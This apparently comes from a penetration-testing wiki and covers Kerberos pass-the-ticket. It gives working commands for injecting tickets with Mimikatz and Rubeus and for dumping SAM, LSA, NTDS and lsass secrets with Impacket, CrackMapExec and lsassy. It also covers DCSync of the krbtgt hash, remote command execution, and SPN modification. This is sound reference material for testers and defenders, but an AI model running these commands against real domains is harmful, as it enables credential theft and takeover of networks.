Pass the ticket
MITRE ATT&CK™ Sub-technique T1550.003

Theory

There are ways to come across (cached Kerberos tickets) or forge (overpass the hash, silver ticket and golden ticket attacks) Kerberos tickets. A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket. Another name for this is Pass the Cache (when using tickets from, or found on, UNIX-like systems).

Practice

Tip: convert ticket to UNIX <-> Windows format
To convert tickets between UNIX/Windows format with ticketConverter.py.
1
# Windows -> UNIX
2
ticketConverter.py $ticket.kirbi $ticket.ccache
3
​
4
# UNIX -> Windows
5
ticketConverter.py $ticket.ccache $ticket.kirbi
Copied!

Injecting the ticket

  • On Windows systems, tools like Mimikatz and Rubeus inject the ticket in memory. Native Microsoft tools can then use the ticket just like usual.
  • On UNIX-like systems, the path to the .ccache ticket to use has to be referenced in the environment variable KRB5CCNAME
UNIX-like
Windows
Once a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.
1
export KRB5CCNAME=$path_to_ticket.ccache
Copied!
The most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatz and Rubeus accept this flag.
This can also be done manually with mimikatz or Rubeus.
1
# use a .kirbi file
2
kerberos::ptt $ticket_kirbi_file
3
​
4
# use a .ccache file
5
kerberos::ptt $ticket_ccache_file
Copied!
1
Rubeus.exe ptt /ticket:$ticket_kirbi_file
Copied!
It is then possible to list the tickets in memory using the klist command.

Passing the ticket

  • On Windows, once Kerberos tickets are injected, they can be used natively.
  • On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.
Credentials dumping
Command execution
The Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.
1
secretsdump.py -k $TARGET
Copied!
​CrackMapExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as "owned" in BloodHound (see dumping credentials from registry hives).
1
crackmapexec smb $TARGETS -k --sam
2
crackmapexec smb $TARGETS -k --lsa
3
crackmapexec smb $TARGETS -k --ntds
Copied!
​Lsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in BloodHound. It works in standalone but also as a CrackMapExec module (see dumping credentials from lsass process memory).
1
crackmapexec smb $TARGETS -k -M lsassy
2
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
3
lsassy -k $TARGETS
Copied!
On Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash.
1
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
Copied!
Some Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.
1
psexec.py -k 'DOMAIN/[email protected]'
2
smbexec.py -k 'DOMAIN/[email protected]'
3
wmiexec.py -k 'DOMAIN/[email protected]'
4
atexec.py -k 'DOMAIN/[email protected]'
5
dcomexec.py -k 'DOMAIN/[email protected]'
Copied!
​CrackMapExec (Python) has the ability to do it on a set of targets
1
crackmapexec winrm $TARGETS -k -x whoami
2
crackmapexec smb $TARGETS -k -x whoami
Copied!
On Windows, legitimate tools like the sysinternals PsExec (download) can then be used to open a cmd using that ticket.
1
.\PsExec.exe -accepteula \\$TARGET cmd
Copied!

Modifying the SPN

When requesting access to a service, a Service Ticket is used. In contains enough information about the user to allow the destination service to decide to grant access or not, without asking the Domain Controller. These information are stored in a protected blob inside the ST called PAC (Privilege Attribute Certificate). In theory, the user requesting access can't tamper with that PAC.
Another information stored in the ST, outside of the PAC, and unprotected, called sname, indicates what service the ticket is destined to be used for. This information is basically the SPN (Service Principal Name) of the target service. It's split into two elements: the service class, and the hostname.
Their are multiple service classes for multiple service types (LDAP, CIFS, HTTP and so on) (more info on adsecurity.org). The problem here is that since the SPN is not protected, there are scenarios (e.g. services configured for constrained delegations) where the service class can be modified in the ticket, allowing attackers to have access to other types of services.
This technique is implemented and attempted by default in all Impacket scripts when doing pass-the-ticket. Impacket calls this "AnySPN".

Resources

Last modified 1mo ago